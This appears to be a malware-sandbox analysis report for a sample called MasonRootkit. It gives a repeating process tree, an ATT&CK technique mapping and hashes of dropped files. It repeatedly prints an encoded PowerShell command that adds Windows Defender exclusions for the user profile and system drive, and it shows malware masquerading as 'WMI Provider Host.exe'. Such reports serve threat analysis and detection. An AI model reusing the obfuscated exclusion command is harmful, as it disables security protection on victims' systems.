        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        204⤵
        
        PID:5568
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        205⤵
        
        PID:4288
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        205⤵
        
        PID:5856
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        205⤵
        
        PID:1348
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        206⤵
        
        PID:7544
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        206⤵
        
        PID:6204
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        206⤵
        
        PID:1008
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        207⤵
        
        PID:4428
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        207⤵
        
        PID:7152
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        207⤵
        
        PID:7284
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        208⤵
        
        PID:8052
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        208⤵
        
        PID:8036
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        208⤵
        
        PID:3216
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        209⤵
        
        PID:5464
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        209⤵
        
        PID:6828
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        209⤵
        
        PID:4624
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        210⤵
        
        PID:7012
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        210⤵
        
        PID:7228
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        210⤵
        
        PID:7304
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        211⤵
        
        PID:5328
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        211⤵
        
        PID:4508
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        211⤵
        
        PID:940
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        212⤵
        
        PID:5016
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        212⤵
        
        PID:7136
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        212⤵
        
        PID:6712
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        213⤵
        
        PID:3488
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        213⤵
        
        PID:7756
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        213⤵
        
        PID:6256
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        214⤵
        
        PID:2532
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        214⤵
        
        PID:924
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        214⤵
        
        PID:3464
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        215⤵
        
        PID:5568
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        215⤵
        
        PID:8008
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        215⤵
        
        PID:6644
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        216⤵
        
        PID:7304
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        216⤵
        
        PID:7420
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        216⤵
        
        PID:8136
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        217⤵
        
        PID:7316
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        217⤵
        
        PID:7560
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        217⤵
        
        PID:5876
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        218⤵
        
        PID:3380
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        218⤵
        
        PID:7440
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        218⤵
        
        PID:6500
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        219⤵
        
        PID:1000
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        219⤵
        
        PID:2736
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        219⤵
        
        PID:8072
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        220⤵
        
        PID:536
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        220⤵
        
        PID:5832
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        220⤵
        
        PID:4224
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        221⤵
        
        PID:7144
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        221⤵
        
        PID:2616
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        221⤵
        
        PID:4004
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        222⤵
        
        PID:212
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        222⤵
        
        PID:1892
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        222⤵
        
        PID:5168
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAcAB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAbQBpACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAdwBrACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAbABsACMAPgA="
        223⤵
        
        PID:384
        
        C:\Windows\WMI Provider Host.exe
        
        "C:\Windows\WMI Provider Host.exe"
        223⤵
        
        PID:7572
        
        C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
        223⤵
        
        PID:4680

C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{704d21e9-aedb-497d-bc73-dc6225fdf461}
1⤵
PID:5748

C:\Windows\System32\sihclient.exe
C:\Windows\System32\sihclient.exe /cv AV93Tpv3Z02TsxHp/D6Tdw.0.2
1⤵
PID:1940

C:\Users\Admin\AppData\Roaming\WMI Provider Host.exe
"C:\Users\Admin\AppData\Roaming\WMI Provider Host.exe"
1⤵
PID:2660

C:\Users\Admin\AppData\Roaming\WMI Provider Host.exe
"C:\Users\Admin\AppData\Roaming\WMI Provider Host.exe"
1⤵
PID:5556

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\MasonRootkit.exe

Filesize
596KB

MD5
bb2fd6c1b233fd2f08a6a43ef860bcb6

SHA1
1cd9ea091bc0d7f907fcd8cf8c8b9d3187e6dc04

SHA256
8c4cddfb3723ecf013526733f93bd5f4408bc463c6a28ccb41b3fb63504ee9ce

SHA512
2ee649cf68e5121bd4ad3e51bdf0c71d773a8d0c67ce262356156b312221285bf62409ac2e2c5c5748adc31d3c94b24777f2918bdb9fcf488c61b0e2c6dc50b5

Download Submit
C:\ProgramData\Microsoft\Windows\OneSettings\config.json

Filesize
5KB

MD5
cfa15d48af384510f69cdc66cc4bbbc1

SHA1
fc9d90052c0d2f8efa12e89ccb9fd469d569a01e

SHA256
8a1b4471575c8e690629164847ce42f8c213d8654328430a56ca2b9243256c85

SHA512
bb343d592a5c650ea962b0bb8446dcf1c3b86d2b913141f6df7a7d99516a7084c375e0e4006ce35f39268c58cd46a6fc527aaf5bbc36be68a7e917128cef298d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\MasonRootkit.exe.log

Filesize
1KB

MD5
3982d6d16fd43ae609fd495bb33433a2

SHA1
6c33cd681fdfd9a844a3128602455a768e348765

SHA256
9a0a58776494250224706cbfbb08562eec3891fb988f17d66d0d8f9af4253cf9

SHA512
4b69315f5d139b8978123bebd417231b28f86b6c1433eb88105465a342339c6c6b8c240a2ca8d2a9c1fca20136c8c167b78a770ab0664231f6e1742291cbf1aa

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\WMI Provider Host.exe.log

Filesize
654B

MD5
2ff39f6c7249774be85fd60a8f9a245e

SHA1
684ff36b31aedc1e587c8496c02722c6698c1c4e

SHA256
e1b91642d85d98124a6a31f710e137ab7fd90dec30e74a05ab7fcf3b7887dced

SHA512
1d7e8b92ef4afd463d62cfa7e8b9d1799db5bf2a263d3cd7840df2e0a1323d24eb595b5f8eb615c6cb15f9e3a7b4fc99f8dd6a3d34479222e966ec708998aed1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
968cb9309758126772781b83adb8a28f

SHA1
8da30e71accf186b2ba11da1797cf67f8f78b47c

SHA256
92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a

SHA512
4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
53KB

MD5
124edf3ad57549a6e475f3bc4e6cfe51

SHA1
80f5187eeebb4a304e9caa0ce66fcd78c113d634

SHA256
638c51e173ca6b3469494a7e2e0b656021a761f77b4a83f3e430e82e7b9af675

SHA512
b6c1a9051feeffad54ba1092fd799d34a9578368d7e66b31780fe478c1def0eb4094dce2879003f7389f2f9d86b94a3ef3975e78092a604597841c9b8db120ee

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
20f136d173e8d69002e965dd8a76717d

SHA1
66deadd6341f51177caeabaaf70c0cc16b5bdbe9

SHA256
2c038d4ff9c4d5705e4b5129f411f03d16c71ca23d7a29162397f7dda2e693f6

SHA512
cb2f2970dbe7c9c9a49ad9302b3de72e3dd69ffff1d5de448da8d5161389f830842a0aa8f84a893f10d7e7d170f4880983d1c4fa197a5b068b17fdeadf2877d5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
8580e0efcafa16b306169ed26e384c1e

SHA1
2ec27eedddd5784f50f464de808d6fabb5a9a72c

SHA256
28f24a666fd58bd5588f38ec97ea7381af45c77e7782401b10d296e8d6e231e6

SHA512
b0e5301a01bb2b40b403647583e5963dc44d2410496154019e5e92cb57465ff7dbab0be043cda5ec385ef1ff969c8477005cf9abb57ce150f58510c6de02ed59

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
a97d929f758937755b0f14433031033c

SHA1
baeb9ffba60f7d761b0f83e10540b845008b5b89

SHA256
eb7875caef45c18185e6f52c98c8798c9a652c529e1fca6a0695746cfef9757d

SHA512
a5571d5a48cde4a171da66e873fa0e71bd7ef706bbb487ee4e63e82fbf4731544f2c2c3ce717e584da8784d227f7eca44959474eb7522da8fef9618cf662840a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
75cc4267e9e0fc10acaf668047e3251e

SHA1
cda8c163a9d0ae66f60a02c38ebdfa2ce50ea317

SHA256
df1b882f4e3878e986d6a95a11861a2547e24a1b0b0be0444edc255560bf032b

SHA512
faad58d69427645f08c544a581e1ee5da2762dde76c1c2d41c43c6e45733366c58dcd39923ea54f35dc4ebeeaf52f78950d855a1c14c03aced0433abab5ef119

Download Submit
C:\Users\Admin\AppData\Local\Temp\MasonRootkit.exe

Filesize
612KB

MD5
5e1eb1a67d40ccae40dee2a037ca6c64

SHA1
786b54d3d451ea40faeeb20fd30a38744862eeb5

SHA256
80e5cb11ae2512da3b7be501b469d6fc1a69a2017a143b9897023da9e366325f

SHA512
0484da209f0c8edff5d1f08b841f3134008ff72fb563fa48a15f96c8ad23fdfb82cc8a59bc729f2db3d359e18558d6f4fbaf4b40955a38787472db438a043205

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_0ux50txz.125.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpBF87.tmp.bat

Filesize
164B

MD5
33dd7706f4093c866e30e11d48ded233

SHA1
d3dc4955596242e9c26eacb19252a135c182f464

SHA256
232b8d1de9626eac168df9b9599046ad55a6c7fedcc6f45c0152ccf4f6d6d642

SHA512
e44a62d60a09add59f965b11041e6e0c51d8dde0e64560fba3aa615f3751c46d8c746c132c4da27baed8ff6f88615bf158cae539674e5d62a325b918f1385324

Download Submit
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work

Filesize
2KB

MD5
f313c5b4f95605026428425586317353

SHA1
06be66fa06e1cffc54459c38d3d258f46669d01a

SHA256
129d0b993cd3858af5b7e87fdf74d8e59e6f2110184b5c905df8f5f6f2c39d8b

SHA512
b87a829c86eff1d10e1590b18a9909f05101a535e5f4cef914a4192956eb35a8bfef614c9f95d53783d77571687f3eb3c4e8ee2f24d23ad24e0976d8266b8890

Download Submit
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work

Filesize
2KB

MD5
7d612892b20e70250dbd00d0cdd4f09b

SHA1
63251cfa4e5d6cbf6fb14f6d8a7407dbe763d3f5

SHA256
727c9e7b91e144e453d5b32e18f12508ee84dabe71bc852941d9c9b4923f9e02

SHA512
f8d481f3300947d49ce5ab988a9d4e3154746afccc97081cbed1135ffb24fc107203d485dda2d5d714e74e752c614d8cfd16781ea93450fe782ffae3f77066d1

Download Submit
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work

Filesize
2KB

MD5
1e8e2076314d54dd72e7ee09ff8a52ab

SHA1
5fd0a67671430f66237f483eef39ff599b892272

SHA256
55f203d6b40a39a6beba9dd3a2cb9034284f49578009835dd4f0f8e1db6ebe2f

SHA512
5b0c97284923c4619d9c00cba20ce1c6d65d1826abe664c390b04283f7a663256b4a6efe51f794cb5ec82ccea80307729addde841469da8d041cbcfd94feb0f6

Download Submit
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work

Filesize
2KB

MD5
0b990e24f1e839462c0ac35fef1d119e

SHA1
9e17905f8f68f9ce0a2024d57b537aa8b39c6708

SHA256
a1106ed0845cd438e074344e0fe296dc10ee121a0179e09398eaaea2357c614a

SHA512
c65ba42fc0a2cb0b70888beb8ca334f7d5a8eaf954a5ef7adaecbcb4ce8d61b34858dfd9560954f95f59b4d8110a79ceaa39088b6a0caf8b42ceda41b46ec4a4

Download Submit
C:\Windows\WMI Provider Host.exe

Filesize
55KB

MD5
